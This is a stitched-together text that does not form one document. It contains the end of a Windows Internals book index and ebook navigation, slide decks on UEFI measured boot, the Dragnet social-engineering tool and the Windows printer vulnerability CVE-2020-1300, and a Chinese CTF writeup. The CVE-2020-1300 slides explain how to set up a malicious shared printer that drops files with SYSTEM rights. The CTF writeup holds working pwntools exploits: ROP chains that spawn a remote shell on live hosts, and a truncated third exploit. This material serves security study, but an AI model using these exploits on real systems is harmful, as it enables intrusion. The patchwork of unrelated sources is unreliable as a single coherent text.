crash dump generation, 548–551
crash report generation, 538–542
dialog box, 541
Fault Reporting process, 540
implementation, 536
kernel reports, 551
kernel-mode (system) crashes, 543–551
overview, 535–537
process hang detection, 551–553
registry settings, 539–540
snapshot creation, 538
user application crashes, 537–542
user interface, 542
Windows 10 Creators Update (RS2), 571
Windows API, executive objects, 128–130
Windows Bind minifilter driver, (BindFit) 248
Windows Boot Manager, 785–799
BCD objects, 798
\Windows directory, 161
Windows hypervisor. See also Hyper-V schedulers
address space isolation, 282–285
AM (Address Manager), 275, 277
architectural stack, 268
on ARM64, 313–314
boot virtual processor, 277–279
child partitions, 269–270, 323
dynamic memory, 285–287
emulation of VT-x virtualization extensions, 309–310
enlightenments, 272
execution vulnerabilities, 282
Hyperclear mitigation, 283
intercepts, 300–301
memory manager, 279–287
nested address translation, 310–313
nested virtualization, 307–313
overview, 267–268
partitions, processes, threads, 269–273
partitions physical address space, 281–282
PFN database, 286
platform API and EXO partitions, 304–305
private address spaces/memory zones, 284
process data structure, 271
processes and threads, 271
root partition, 270, 277–279
SLAT table, 281–282
startup, 274–279
SynIC (synthetic interrupt controller), 301–304
thread data structure, 271
VAL (VMX virtualization abstraction layer), 274, 279
VID driver, 272
virtual processor, 278
VM (Virtualization Manager), 278
VM_VP data structure, 278
VTLs (virtual trust levels), 281
Windows hypervisor loader (Hvloader), BCD options, 796–797
Windows loader issues, troubleshooting, 556–557
Windows Memory Diagnostic Tool, 845
Windows OS Loader, 792–796, 808–810
Windows PowerShell, 774
Windows services
accounts, 433–446
applications, 426–433
autostart startup, 451–457
boot and last known good, 460–462
characteristics, 429–433
Clipboard User Service, 472
control programs, 450–451
delayed autostart, 457–458
failures, 462–463
groupings, 466
interactive services/session 0 isolation, 444–446
local service account, 436
local system account, 434–435
network service account, 435
packaged services, 473
process, 428
protected services, 474–475
Recovery options, 463
running services, 436
running with least privilege, 437–439
SCM (Service Control Manager), 426, 446–450
SCP (service control program), 426
Service and Driver Registry parameters, 429–432
service isolation, 439–443
Service SIDs, 440–441
shared processes, 465–468
shutdown, 464–465
startup errors, 459–460
Svchost service splitting, 467–468
tags, 468–469
triggered-start, 457–459
user services, 469–473
virtual service account, 443–444
window stations, 445
Windows threads, viewing user start address for, 89–91. See also thread-local
register effect
WindowStation object, 129
Wininit, 831–835
Winload, 792–796, 808–810
Winlogon, 831–834, 838
WinObjEx64 tool, 125
WinRE (Windows Recovery Environment), 845–846. See also recovery
WMI (Windows Management Instrumentation)
architecture, 487–488
CIM (Common Information Model), 488–495
class association, 493–494
Control Properties, 498
DMTF, 486, 489
implementation, 496–497
Managed Object Format Language, 489–495
MOF (Managed Object Format), 488–495
namespace, 493
ODBC (Open Database Connectivity), 488
overview, 486–487
providers, 488–489, 497
scripts to manage systems, 495
security, 498
System Control commands, 497
WmiGuid object, 130
WmiPrvSE creation, viewing, 496
WNF (Windows Notification Facility)
event aggregation, 237–238
features, 224–225
publishing and subscription model, 236–237
state names and storage, 233–237
users, 226–232
WNF state names, dumping, 237
wnfdump command, 237
WnfDump utility, 226, 237
WoW64 (Windows-on-Windows)
ARM, 113–114
ARM32 simulation on ARM 64 platforms, 115
core, 106–109
debugging in ARM64, 122–124
exception dispatching, 113
file system redirection, 109–110
memory models, 114
overview, 104–106
registry redirection, 110–111
system calls, 112
user-mode core, 108–109
X86 simulation on AMD64 platforms, 759–751
X86 simulation on ARM64 platforms, 115–125
write throttling, 596–597
write-back caching and lazy writing, 589–595
write-behind and read-ahead. See read-ahead and write-behind
WSL (Windows Subsystem for Linux), 64, 128
X
x64 systems, 2–4
viewing GDT on, 4–5
viewing TSS and IST on, 8–9
x86 simulation in ARM64 platforms, 115–124
x86 systems, 3, 35, 94–95, 101–102
exceptions and interrupt numbers, 86
Retpoline code sequence, 23
viewing GDT on, 5
viewing TSSs on, 7–8
XML descriptor, Task Scheduler, 479–481
XPERF tool, 504
XTA cache, 118–120
Code Snippets
Many titles include programming code or configuration examples. To
optimize the presentation of these elements, view the eBook in single-
column, landscape mode and adjust the font size to the smallest setting. In
addition to presenting code and configurations in the reflowable text format,
we have included images of the code that mimic the presentation found in the
print book; therefore, where the reflowable format may compromise the
presentation of the code listing, you will see a “Click here to view code
image” link. Click the link to view the print-fidelity code image. To return to
the previous page viewed, click the Back button on your device or app.
Contents
Cover Page
Title Page
Copyright Page
Dedication Page
Contents at a glance
Contents
About the Authors
Foreword
Introduction
Chapter 8. System mechanisms
Processor execution model
Hardware side-channel vulnerabilities
Side-channel mitigations in Windows
Trap dispatching
WoW64 (Windows-on-Windows)
Object Manager
Synchronization
Advanced local procedure call
Windows Notification Facility
User-mode debugging
Packaged applications
Conclusion
Chapter 9. Virtualization technologies
The Windows hypervisor
The virtualization stack
Virtualization-based security (VBS)
The Secure Kernel
Isolated User Mode
Conclusion
Chapter 10. Management, diagnostics, and tracing
The registry
Windows services
Task scheduling and UBPM
Windows Management Instrumentation
Event Tracing for Windows (ETW)
Dynamic tracing (DTrace)
Windows Error Reporting (WER)
Global flags
Kernel shims
Conclusion
Chapter 11. Caching and file systems
Terminology
Key features of the cache manager
Cache virtual memory management
Cache size
Cache data structures
File system interfaces
Fast I/O
Read-ahead and write-behind
File systems
The NT File System (NTFS)
NTFS file system driver
NTFS on-disk structure
NTFS recovery support
Encrypted file system
Direct Access (DAX) disks
Resilient File System (ReFS)
ReFS advanced features
Storage Spaces
Conclusion
Chapter 12. Startup and shutdown
Boot process
Conclusion
Contents of Windows Internals, Seventh Edition, Part 1
Index
Code Snippets
i
ii
iii
iv
v
vi
vii
viii
ix
x
xi
xii
xiii
xiv
xv
xvi
xvii
xiix
xix
xx
xxi
xxii
xxiii
xxiv
xxv
xxvi
xxvii
xxviii
xxix
xxx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882 | pdf |
Hacking Measured Boot and
UEFI
Dan Griffin
JW Secure, Inc.
WWJBD?
Don’t let h@xors keep you from
getting the girl…
Introduction
• What is UEFI?
• What is a TPM?
• What is “secure boot”?
• What is “measured boot”?
• What is “remote attestation”?
Hardware Landscape
• BYOD
• Capability standards
– Phones
– Tablets
– PCs
Why the UEFI lock down?
• OEM & ISV revenue streams
• Importance of app store based user
experience
• Defense against rootkits & bad drivers
• Screw the Linux community
State of UEFI
• Not new
• Full featured – can even include a network
stack (yikes!)
• Software dev kits are available (Intel
TianoCore)
• Test hardware is available (Intel;
BeagleBoard)
UEFI secure boot
• Usually can be disabled/modified by user
o Behavior varies by implementation
o Complicated, even for power users
• But not on Windows 8 ARM. Options:
o Buy a $99 signing certificate from VeriSign
o Use a different ARM platform
o Use x86
Measured Boot + Remote
Attestation
What is measured boot?
TPM
BIOS
Boot
Loader
Kernel
Early
Drivers
Hash of next item(s)
Boot Log
[PCR data]
[AIK pub]
[Signature]
What is remote attestation?
Client Device
TPM
Signed
Boot
Log
Attestation
Server
some token…
Demo
Measured Boot Tool
(http://mbt.codeplex.com/)
Part 1: What’s in the boot log?
Demo
Measured Boot Tool
(http://mbt.codeplex.com/)
Part 2: How do you do remote
attestation?
C: Get AIK creation nonce
S: Nonce
C: Get challenge (EK pub, AIK pub)
S: Challenge
C: Get attestation nonce
S: Nonce
C: Signed boot log
S: Token
Client
Device
Attestation
Service
Demo
Sample application #1: reduce
fraud, protect the bank from
h@xors, get the girl
Cloud Services Demand ID
• Enterprise: BYOD
• Consumer
– Targeted advertising
– eCommerce, mobile banking, etc.
• But most user IDs are static & cached on device
– That only works for low-value purchases
– How to improve ID for high-value purchases?
Low Friction Authentication
• Each additional screen requiring user input
– Slows down the process while user reorients
– Causes more users to abandon the web site
• In contrast, Progressive Authentication:
– Let users investigate a site using just cookies
– Defers questions until information is needed
– Reduces user drop out from frustration
Splash Screen
• The screen a user sees
when app launched
• With similar data in the
launch tile
User Sign in
• User name can be
taken from cookie
• But account details
are hidden until the
user enters a
password
Enrollment - 1
• The first time the app
is used the user must
active the app
• When this button is
pressed an SMS
message is sent to the
phone # on file
Enrollment - 2
• After the user gets the
pin from the SMS
message, it is entered
• After this the user
proceeds as with a
normal sign-in
procedure
After Sign-in
• The user sees all
account information
User tries to move
money
• When user goes to
move $ out of account
• The health of the device
is checked
Remediation Needed
• If the device is not
healthy enough to
allow money transfer
• The user is directed to
a site to fix the problem
Demo
Sample application #2: reduce
fraud, protect MI6 from h@xors,
get the girl
Pseudo-Demo
Sample application #3: protect the
data from h@xors, etc…
Policy-Enforced File Access
• BYOD
• Download sensitive files from document
repository
• Leave laptop in back of taxi
Weaknesses
• UEFI toolkits evolving rapidly
• Provisioning; TPM EK database
• Integrity of the TPM hardware
• Hibernate file is unprotected
• Trend of migration from hardware to
firmware
• Patching delay & whitelist maintenance
Conclusion
• Likelihood of mainstream adoption?
• What the consumerization trend means for
hackers
• Opportunities in this space
Questions?
[email protected]
206-683-6551
@JWSdan
JW Secure provides custom security
software development services. | pdf |
Truman Kain
TEVORA
Dragnet
Your Social Engineering Sidekick
TL;DR
Your social engineering conversions
will increase with Dragnet.
Current States of:
•OSINT
•Analytics
•S.E. Engagements
OSINT
•Manual
•Repetitive
•Fleeting when automated
Analytics
Big companies live off of it
–Jeff Bezos, 1997
“3 years ago I was working at a quantitative hedge fund
when I came across a startling statistic…”
Analytics
You’re ignoring it
S.E. Engagements
Choose Two One.
Effective
Quick
Inexpensive
Dragnet
•OSINT
•Automation
•Machine Learning
•Open-Source
The Stack
Vue.js
Dragnet OSINT
1. Import Targets
2. Keep your hands
near the wheel
Dragnet Automation
•OSINT Gathering*
•Infrastructure Deployment
•Campaign Execution
•Data Correlation
Dragnet ML
P (creds | target, template)
Dragnet ML
1.
Tag your templates
2.
Import prior conversion data
3.
Then…
Dragnet ML
3. Say your prayers.
DEMO
What’s Next?
•Ringless Voicemail Drops
•Individual Targeting
•Distributed Vishing
•Native Mobile?!
•[Your Request Here]
Truman Kain
TEVORA
Dragnet
Your Social Engineering Sidekick
Thank you!
threat.tevora.com/dragnet | pdf |
Evil Printer
How to Hack Windows Machines with Printing Protocol
Who are We?
• Zhipeng Huo (@R3dF09)
• Senior security researcher
• Member of EcoSec Team at Tencent Security Xuanwu Lab
• Windows and macOS platform security
• Speaker of Black Hat Europe 2018
Who are We?
• Chuanda Ding (@FlowerCode_)
• Senior security researcher
• Leads EcoSec Team at Tencent Security Xuanwu Lab
• Windows platform security
• Speaker of Black Hat Europe 2018, DEF CON China 2018, CanSecWest
2017/2016
Agenda
• Printing internals
• Attack surfaces
• CVE-2020-1300
• Exploitation walk-through
• Patch
• Conclusion
Evil Printer?
https://twitter.com/R3dF09/status/1271485928989528064
How does Network Printing Works
Hey, server, print this document
Client
Server
Printer
Hey, printer, print this
Done!
Rendering in Network Printing
Application Data
Printer Driver
Printer Data
Client-side Rendering
Client
Send Printer Data
Application Data
Printer Driver
Printer Data
Server
Server
Client
Send Application Data
Server-side Rendering
What is Printer Driver?
• Rendering component
• Convert application data into printer specified data
• Configuration component
• Enable user to configure printer
Interface component between OS and Printer
“In order to support both client-side
and server-side rendering, It is a
requirement that printer drivers are
available to print server and print
client.”
Supporting Client-Side Rendering and Server-Side Rendering
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
prsod/e47fedcc-d422-42a6-89fc-f04eb0c168e3
How is Printer Drivers Distributed?
• Allows a print client to download printer driver directly
from a print server
Point-And-Print
• Allows a print client to download a printer support
package that includes the print driver
Package Point-And-Print
“The package approach to driver installation
provides improved security for point and print
by checking driver signing during the
establishment of a point and print connection.”
Point and Print with Packages
https://docs.microsoft.com/en-us/windows-
hardware/drivers/print/point-and-print-with-packages
Print Spooler Service
• Manages printer drivers
• Retrieves correct printer driver
• Loads the driver
• Primary component of Windows Printing
• Auto-start service, always running
• Manage the printing process
• Export printing APIs
• Implements both Print Client and Server roles
• Dangerous design
• SYSTEM privilege level
• Does networking
• Dynamically loads third-party binaries
Client-Server Printing Model
Print Client
Applications
Print Spooler
Print Server
Printer Driver
Print Spooler
Printer Driver
Print Queue
Printing API
SMB
Why Target Windows Printing?
• Much older than average Windows legacies
• More than 25 years (!)
• One of the most important services
• Highly integrated with OS
• Very complex and confusing
• Highest privilege level
Local Attack Surfaces
• Windows printing has many services and components work at highest
privilege level
• They export surfaces to lower privilege level even AppContainer
• Abusing them could result in Local Privilege Escalation or Sandbox
Escape
Remote Attack Surfaces
• Attack print server
• Expose the System in the unsafe network
• Attack print client
• May be suffering from the unsafe print server (Evil Printer)
What Happens Behind the
Scene when Windows Connect
to a Printer?
Print Client Connects to Print Server
• Add-Printer –ConnectionName \\printServer\printerName
PowerShell
• AddPrinterConnection
• AddPrinterConnection2
Win32 Print Spooler API
• printui /im
GUI
All Roads to
winspool!AddPrinterConnection2
BOOL AddPrinterConnection2(
_In_ HWND hWnd,
_In_ LPCTSTR pszName,
DWORD dwLevel,
_In_ PVOID pConnectionInfo
);
pszName [in]
A pointer to a null-terminated string that specifies the name of a
printer to which the current user wishes to establish a connection.
Warning Dialog after AddPrinterConnection2
Purpose of Warning Dialog
• What If the Printer Driver is Malicious?
• CVE-2016-3238
• Windows Print Spooler Remote Code Execution
• A remote code execution vulnerability exists when the Windows Print Spooler
service does not properly validate print drivers while installing a printer from
servers.
• “The update addresses the vulnerability by issuing a warning to users
who attempt to install untrusted printer drivers”
AddPrinterConnection2 Internals
winspool!Ad
dPrinterCon
nection2
spoolsv!Rpc
AddPrinterC
onnection2
Print Client
Print server
Applications
Print
Spooler
Print
Spooler
1. RPC call
2. RPC call
3. return
4. return
AddPrinterConnection2 Internals
• ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED
• 0x00000BB9
• winspool!DownloadAndInstallLegacyDriver
• ntprint!PSetupDownloadAndInstallLegacyDriver
• ntprint!DisplayWarningForDownloadDriver
• ntprint!DownloadAndInstallLegacyDriver
Point-and-Print or Package Point-And-Print?
Capture the Driver Download
Capture the Driver Install
It’s Point-And-Print!
How to enable Package Point-And-Print mechanism?
spoolsv!RpcAddPrinterConnection2
spoolsv!RpcAddPrinterConnection2
win32spl!TPrintOpen::CreateLocalPrinter
win32spl!TPrintOpen::AcquireV3DriverAndAddPrinter
win32spl!TDriverInstall::DeterminateInstallType
win32spl!TDriverInstall::CheckPackagePointAndPrint
win32spl!TDriverInstall::Check
PackagePointAndPrint
if (v5 >= 0) {
v14 = *v1;
if (*(_BYTE *)(v14 + 0xA8) & 1) {
v5 = TDriverInstall::DownloadAndImportDriverPackages(v2,
(struct _DRIVER_INFO_8W *)v14);
}
}
Get Object
Print Client
win32spl!NCSRCo
nnect::TConnect
ion::RemoteGetP
rinterDriver
Print Server
spoolsv!TRemote
Winspool::RpcAs
yncGetPrinterDr
iver
RPC
Get Object
_DRIVER_INFO_8W Structure
+0x000 cVersion
: Uint4B
+0x008 pName
: Ptr64 Wchar
+0x010 pEnvironment
: Ptr64 Wchar
+0x018 pDriverPath
: Ptr64 Wchar
+0x020 pDataFile
: Ptr64 Wchar
+0x028 pConfigFile
: Ptr64 Wchar
+0x030 pHelpFile
: Ptr64 Wchar
+0x038 pDependentFiles
: Ptr64 Wchar
+0x040 pMonitorName
: Ptr64 Wchar
+0x048 pDefaultDataType : Ptr64 Wchar
+0x050 pszzPreviousNames : Ptr64 Wchar
+0x058 ftDriverDate
: _FILETIME
+0x060 dwlDriverVersion : Uint8B
+0x068 pszMfgName
: Ptr64 Wchar
+0x070 pszOEMUrl
: Ptr64 Wchar
+0x078 pszHardwareID
: Ptr64 Wchar
+0x080 pszProvider
: Ptr64 Wchar
+0x088 pszPrintProcessor : Ptr64 Wchar
+0x090 pszVendorSetup
: Ptr64 Wchar
+0x098 pszzColorProfiles : Ptr64 Wchar
+0x0a0 pszInfPath
: Ptr64 Wchar
+0x0a8 dwPrinterDriverAttributes : Uint4B
+0x0b0 pszzCoreDriverDependencies : Ptr64 Wchar
+0x0b8 ftMinInboxDriverVerDate : _FILETIME
+0x0c0 dwlMinInboxDriverVerVersion : Uint8B
PrinterDriverAttributes
#define PRINTER_DRIVER_PACKAGE_AWARE 0x00000001
#define PRINTER_DRIVER_XPS 0x00000002
#define PRINTER_DRIVER_SANDBOX_ENABLED 0x00000004
#define PRINTER_DRIVER_CLASS 0x00000008
#define PRINTER_DRIVER_DERIVED 0x00000010
#define PRINTER_DRIVER_NOT_SHAREABLE 0x00000020
#define PRINTER_DRIVER_CATEGORY_FAX 0x00000040
#define PRINTER_DRIVER_CATEGORY_FILE 0x00000080
#define PRINTER_DRIVER_CATEGORY_VIRTUAL 0x00000100
#define PRINTER_DRIVER_CATEGORY_SERVICE 0x00000200
#define PRINTER_DRIVER_SOFT_RESET_REQUIRED 0x00000400
#define PRINTER_DRIVER_SANDBOX_DISABLED 0x00000800
#define PRINTER_DRIVER_CATEGORY_3D 0x00001000
#define PRINTER_DRIVER_CATEGORY_CLOUD 0x00002000
Driver Package
• A collection of the files needed to successful load a driver
• device information file (.inf)
• catalog file
• all the files copied by .inf file
Where to Get PCC (Package Cabinet)
InfPath:
C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_85c8869cca48951c\prnms003.inf
PackagePath:
C:\Windows\System32\spool\drivers\x64\PCC\prnms003.inf_amd64_85c8869cca48951c.cab
DownloadAndImportDriverPackages
• TDriverInstall::DownloadAndImportDriverPackages
• TDriverInstall::DownloadAndExtractDriverPackageCab
• TDriverInstall::InternalCopyFile
• NCabbingLibrary::LegacyCabUnpack
Cabinet File
• Archive-file format for Microsoft Windows
• A file that has the suffix .cab and that acts as a container for other
files
• It serves as a compressed archive for a group of files
File Decompression Interface APIs
• Cabinet!FDICreate
• Creates an FDI context
• Cabinet!FDICopy
• Extracts files from cabinet
• Cabinet!FDIDestroy
• Deletes an open FDI context
FDICopy
BOOL DIAMONDAPI FDICopy(
HFDI hfdi,
LPSTR pszCabinet,
LPSTR pszCabPath,
int flags,
PFNFDINOTIFY pfnfdin,
PFNFDIDECRYPT pfnfdid,
void *pvUser
);
pfnfdin
Pointer to an application-defined callback notification function
to update the application on the status of the decoder. The
function should be declared using the FNFDINOTIFY macro.
win32spl!NCabbingLibrary::LegacyCabUnpack
FDICopy(v12,
pszCabinet,
pszCabPath,
0,
(PFNFDINOTIFY)NCabbingLibrary::FdiCabNotify,
0i64,
&pvUser);
NCabbingLibrary::FdiCabNotify
• fdintCOPY_FILE Information identifying the file to be copied
if ( v15 >= 0 ) {
v17 = *(_QWORD *)v3;
v21 = -1i64;
v15 = NCabbingLibrary::ProcessCopyFile(
(NCabbingLibrary *)Block,
*(const unsigned __int16 **)(v17 + 8),
(const unsigned __int16 *)&v21,
v16);
operator delete(Block);
v4 = v21;
}
NCabbingLibrary::ProcessCopyFile
• NCabbingLibrary::CreateFullPath
• Check ‘..\’
• But forget ‘../’ ?
• _wopen
• _O_BINARY|_O_CREAT|_O_TRUNC|_O_RDWR
v12 = wcschr(v10, '\\');
// check for ..\
v13 = v12;
if ( !v12 )
break;
*v12 = 0;
v14 = *v11 - asc_1800B3FF0[0];
if ( !v14 )
{
v14 = v11[1] - '.';
if ( v11[1] == '.' )
v14 = v11[2];
}
if ( v14 )
{
if ( !CreateDirectoryW(v8, 0i64) && GetLastE
rror() != 183 )
v8 = NCabbingLibrary::CreateFullPath((NCabbingLibrary *
)FileName, (const unsigned __int16 *)v9);
if ( v8 >= 0 )
{
v7 = (NCoreLibrary::TString *)_wopen(v10, 0x8302, 0
x180i64);
*(_QWORD *)a3 = v7;
Make Malformed Cab
• makecab 112112DiagSvcs2USERENV.dll test.cab
HexEdit Cab file
Malformed Cabinet
Prepare Print Server
• Install Virtual Printer
• CutePDF Writer
• Share the printer
SHA1 of CuteWriter: fdf1f3f2a83d62b15c6bf84095fe3ae2ef8e4c38
Default PrinterDriverAttributes of
CutePDF Writer
Make an Evil Printer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows
x64\Drivers\Version-3\CutePDF Writer v4.0
•PrinterDriverAttributes = 1
•InfPath = "c:\test\test.inf"
Create a file C:\test\test.inf
Place test.cab at C:\Windows\System32\spool\drivers\x64\PCC
Make an Evil Printer
Print Client Connects to Evil Printer
What Else Can It Do?
https://www.youtube.com/watch?v=dfMuzAZRGm4
https://www.youtube.com/watch?v=dfMuzAZRGm4
Microsoft Edge
• Microsoft Edge renderer process is the most restricted AppContainer
Sandbox
• Capability: lpacPrinting
CPrintTicket WoW Services
AppContainer
Sandbox Escape
IPrintTicketServicePtr print_ticket;
CoCreateInstance(CLSID_PrintTicket,
nullptr,
CLSCTX_LOCAL_SERVER,
IID_PPV_ARGS(&print_ticket));
print_ticket->Bind(L"\\\\[PrintServer]\\[PrinterName]", 1);
Sandbox Escape
AppContainer
Windows OS
DllHost
Spooler
CreateFile
CreateFile
CPrintTicketServerBase::Bind
GetPrinterDriver
Sandbox Escape Demo
Patch
if ( !wcsstr(Str, L"../") && !wcsstr(Str, L"..\\") )
{
v14 = *(_QWORD *)v3;
v22 = -1i64;
v15 = NCabbingLibrary::ProcessCopyFile(
(NCabbingLibrary *)Str,
*(const unsigned __int16 **)(v14 + 8),
(const unsigned __int16 *)&v22,
v13);
operator delete(Str);
v4 = v22;
v3[2] = v15;
return v4;
}
win32spl!NCabbingLibrary::FdiCabNotify
Possible Attack Scenarios
• Lateral movement
• Modify a trusted printer
• Remote code execution
• Connect to attacker-controlled printer
• Privilege escalation
• Make a printer connection attempt
• NT AUTHORITY\SYSTEM for all scenarios
CVE-2020-1300
Don’t Be Panic
do {
if ( v10 >= v6 )
break;
v11 = v7[v10] - 47;
// "/"
if ( v11 <= 45u )
// "\"
{
v12 = v11;
v13 = 0x200000000801i64;
if ( _bittest64(&v13, v12) )
v21 = v9 + 1;
}
v10 = ++v9;
} while ( v7[v9] );
cabview!CCabItemList::AddItem
Conclusion
Windows Printing Implementation is complex
Walk through of CVE-2020-1300
• Can be exploited both locally and remotely
• Execute arbitrary code
• Sandbox Escape
• NT AUTHORITY\SYSTEM
For developers, handle the cabinet API callbacks carefully
Logic bugs are always fun!
Special Thanks
• James Forshaw (@tiraniddo)
• Vectra AI
• Yang Yu (@tombkeeper)
Thanks.
Tencent Security Xuanwu Lab
@XuanwuLab
xlab.tencent.com | pdf |
第五空间 WriteUp By Nu1L
第五空间 WriteUp By Nu1L
PWN
bountyhunter
CrazyVM
notegame
pb
Crypto
ecc
signin
doublesage
Blockchain
CallBox
Web
EasyCleanup
pklovecloud
PNG图⽚转换器
yet_another_mysql_injection
WebFTP
个⼈信息保护
data_protection
Mobile
uniapp
Misc
签到题
云安全
Cloud_QM
PWN
bountyhunter
from pwn import *
s = remote("139.9.123.168",32548)
#s = process("./pwn")
sh = 0x403408
pop_rdi = 0x000000000040120b
payload = b'A'*0x98+p64(pop_rdi)+p64(sh)+p64(pop_rdi+1)+p64(0x401030)
# open("./payload","wb").write(payload)
s.sendline(payload)
s.interactive()
CrazyVM
from pwn import *
def movReg(typea,typeb,reg1,reg2):
opcode = b'\x01'
opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2)
return opcode.ljust(8,b'\x00')
def movi(typeb,reg1,val):
opcode = b'\x01'
opcode += p8(1)+p8(typeb)+p8(reg1)+p32(val)
return opcode.ljust(8,b'\x00')
def push(reg):
opcode = b'\x12'
opcode += b'\x04\x03'
opcode += p8(reg)
return opcode.ljust(8,b'\x00')
def pop(reg):
opcode = b'\x13'
opcode += b'\x04\x03'
opcode += p8(reg)
return opcode.ljust(8,b'\x00')
def addReg(typea,typeb,reg1,reg2):
opcode = b'\x02'
opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2)
return opcode.ljust(8,b'\x00')
def subReg(typea,typeb,reg1,reg2):
opcode = b'\x03'
opcode += p8(typea)+p8(typeb)+p8(reg1)+p8(reg2)
return opcode.ljust(8,b'\x00')
def bye():
return b'\x00\x05\x03'.ljust(8,b'\x00')
opcode = b''
# s = process("./CrazyVM")
s = remote("114.115.221.217","49153")
libc = ELF("./libc-2.31.so")
pop_rdi = 0x0000000000026b72
sh = 0x001b75aa
system = libc.sym['system']
opcode += movReg(0,3,0,0x10) #reg0 libc offset
notegame
opcode += movi(2,0x11,0x100ff0-0x80000)
opcode += addReg(0,3,0,0x11)
opcode += movReg(0,3,0x10,0)
opcode += movi(2,0x11,0x1ef2e0)
opcode += addReg(0,3,0x10,0x11)
opcode += pop(1) #reg1 environ
opcode += movReg(0,3,0x10,0)
opcode += movi(2,0x11,0x1ec5a0)
opcode += addReg(0,3,0x10,0x11)
opcode += pop(2)
opcode += movi(2,0x11,0x1ec5c0)
opcode += subReg(0,3,2,0x11) #reg2 libc
opcode += movReg(0,3,3,1)
opcode += subReg(0,3,3,2)
opcode += addReg(0,3,3,0) #reg3 stack offset
opcode += movi(2,0x11,0x100-4*8)
opcode += subReg(0,3,3,0x11)
opcode += movReg(0,3,0x10,3)
opcode += movReg(0,3,4,2)
opcode += movi(2,0x11,pop_rdi)
opcode += addReg(0,3,4,0x11) #reg4 pop rdi
opcode += movReg(0,3,5,2)
opcode += movi(2,0x11,sh)
opcode += addReg(0,3,5,0x11) #reg5 sh
opcode += movReg(0,3,6,2)
opcode += movi(2,0x11,system)
opcode += addReg(0,3,6,0x11) #reg6 system
opcode += movReg(0,3,7,2)
opcode += movi(2,0x11,pop_rdi+1)
opcode += addReg(0,3,7,0x11)
opcode += push(6)+push(7)+push(5)+push(4)
opcode += bye()
# gdb.attach(s,"b *$rebase(0x174e)\nc")
s.sendafter(b"input code for vm: ",opcode)
s.sendafter(b"input data for vm: ",b"\n")
s.interactive()
from pwn import *
def add(size,buf):
s.sendlineafter(b"Note@Game:~$",b"AddNote")
s.sendlineafter(b"Size: ",str(size).encode())
s.sendafter(b"Note: ",buf)
def show(idx):
s.sendlineafter(b"Note@Game:~$",b"ShowNote")
s.sendlineafter(b"Index: ",str(idx).encode())
def edit(idx,buf):
s.sendlineafter(b"Note@Game:~$",b"EditNote")
s.sendlineafter(b"Index: ",str(idx).encode())
s.sendafter(b"Note: ",buf)
def free(idx):
s.sendlineafter(b"Note@Game:~$",b"DelNote")
s.sendlineafter(b"Index: ",str(idx).encode())
def update(size,buf,info):
s.sendlineafter(b"Note@Game:~$",b"UpdateInfo")
s.sendlineafter(b"Length: ",str(size).encode())
s.sendafter(b"Name: ",buf)
s.sendafter(b"Info: ",info)
def view():
